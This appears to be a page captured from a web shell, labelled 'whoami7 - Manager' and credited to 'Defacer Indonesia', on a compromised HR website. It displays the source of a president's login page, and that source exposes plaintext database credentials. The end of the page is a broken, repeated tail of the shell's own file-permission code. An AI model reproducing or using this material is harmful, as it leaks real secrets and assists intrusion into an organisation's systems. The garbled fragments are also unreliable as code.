Asikk-&wkwkwkwkw

whoami7 - Manager
: /home/gracious/hris.graciousphils.com/presidential.account/
files >> /home/gracious/hris.graciousphils.com/presidential.account/index.php
 <?php
session_start();
$host="localhost";

$socket="";
$user="gracious_administrator";
$password="Cronica2020";
$dbname="gracious_hris";
$dbh = new PDO("mysql:host={$host};dbname={$dbname}", $user, $password);
$dbh->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION );
/*/
if(isset($_POST['proceed']))
{
$search = utf8_decode($_POST['search']);
$bday = $_POST['birthdate'];
$sql ="SELECT FullName,Birthdate FROM employee_verifier WHERE FullName = :search and Birthdate = :bday";
$query= $dbh -> prepare($sql);
$query-> bindParam(':search', $search, PDO::PARAM_STR);
$query-> bindParam(':bday', $bday, PDO::PARAM_STR);
$query-> execute();
$results=$query->fetchAll(PDO::FETCH_OBJ);
if($query->rowCount() > 0)
{
echo "<script>alert('Verified! You can now proceed to Registration');</script>";
echo "<script type='text/javascript'> document.location = 'registration.php'; </script>";
 } else {

  echo "<script>alert('Invalid Details');</script>";

}
}
/*/
?>
<!DOCTYPE html>
<html lang="en">
    <head>

        <!-- Title -->
        <!--<title>ELMS | Home Page</title>-->
        <title>President's Account</title>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
         
        <link rel="stylesheet" href="includes/assets/bootstrap.min.css">

        <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>
        
        <link rel="stylesheet" type="text/css" href="styles.css">
        <Style>
 @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800;900&display=swap');

        </Style>
        


        <!-- Theme Styles -->
        <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
        <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
        <!--[if lt IE 9]>
        <script src="http://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
        <script src="http://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
        <![endif]-->
<script type="text/javascript">
        window.history.forward();
        function noBack() {
            window.history.forward();
        }
</script>
    </head>
<body>
<div class="container" style="padding-top: 75px;">
    <div class="row">
        <div class="col-md-3">
            
        </div>
        <div class="col-md-6">
            <div class="card">
                <div class="card-header bg-primary text-white">

                        <div class="col-md-3">
                            <img height="35" width="35" src="icons/president.png" alt="Login" class="image">&nbsp;Login Form
                        </div>
                        <div class="col-md-12">
                            <?php 
                            if (isset($_POST['signin'])) 
                            {
                                $user = htmlspecialchars($_POST['username']);
                                $pass = htmlspecialchars($_POST['passwords']);

                                $sql = "SELECT * FROM presidential_account where UserName = :user and PassWord = :pass and Job_Category = 'President'";
                                $query= $dbh -> prepare($sql);
                                $query-> bindParam(':user', $user, PDO::PARAM_STR);
                                $query-> bindParam(':pass', $pass, PDO::PARAM_STR);
                                $query-> execute();
                                $results=$query->fetchAll(PDO::FETCH_OBJ);
                                if($query->rowCount() > 0) 
                                {
                                    foreach ($results as $result) {
                                    $_SESSION['presid']=$result->id;
                                    $_SESSION['presuser']=$result->UserName;
                                    $_SESSION['prespass']=$result->PassWord;
                                    $_SESSION['job']=$result->Job_Category;
                                    }
                                    $_SESSION['preslogin']=$_POST['username'];
                                    echo "<script type='text/javascript'> document.location = 'dashboard.php'; </script>";
                                }
                                else
                                {
                                    echo "<div class='alert alert-dismissible alert-danger'>
                                          <button type='button' class='btn-close' data-bs-dismiss='alert'></button>
                                          <strong>Wrong</strong> credentials.
                                        </div>";
                                }
                            }
                            ?>
                        </div>
                   
                </div>
                <div class="card-body bg-info">
                    <form method="POST">
                        <div class="form-group">
                            <label class="form-label text-white" style="font-weight: bold;">Login Credentials</label>
                            <div class="form-floating">
                                <input type="text" class="form-control" id="username" name="username" placeholder="name@example.com">
                                <label for="floatingInput">Username</label>
                            </div>
                            <div class="form-floating mt-2">
                                <input type="password" class="form-control" id="passwords" name="passwords" placeholder="Password" autocomplete="off">
                                <label for="floatingPassword">Password</label>
                            </div>
                        </div>
                        <button type="submit" class="btn btn-primary mt-2" style="float:right;" name="signin" id="signin"><img height="30" width="30" src="icons/signin.png" alt="Login" class="image">&nbsp;Sign In</button>

                    </form>
                </div>
            </div>
        </div>
        <div class="col-md-3">
            
        </div>
    </div> 
</div>

<script type="text/javascript">

document.onkeydown = function(e) {
if(event.keyCode == 123) {
    return false;
}
if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'C'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'X'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'Y'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'Z'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'V'.charCodeAt(0)){
    return false;
}
if (e.keyCode == 67 && e.shiftKey && (e.ctrlKey || e.metaKey)){
    return false;
}
if (e.keyCode == 'J'.charCodeAt(0) && e.altKey && (e.ctrlKey || e.metaKey)){
    return false;
}
if (e.keyCode == 'I'.charCodeAt(0) && e.altKey && (e.ctrlKey || e.metaKey)){
    return false;
}
if ((e.keyCode == 'V'.charCodeAt(0) && e.metaKey) || (e.metaKey && e.altKey)){
    return false;
}
if (e.ctrlKey && e.shiftKey && e.keyCode == 'C'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)){
    return false;
}
if(e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)){
    return false;
}
}
if (document.addEventListener) {
    document.addEventListener('contextmenu', function(e) {
    e.preventDefault();
    }, false);
}else{
    document.attachEvent('oncontextmenu', function() {
    window.event.returnValue = false;
    });
}
</script>
</body>


</html>
Copyright ©2021 || Defacer Indonesia nfo .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> )); return $info; } ?> ?>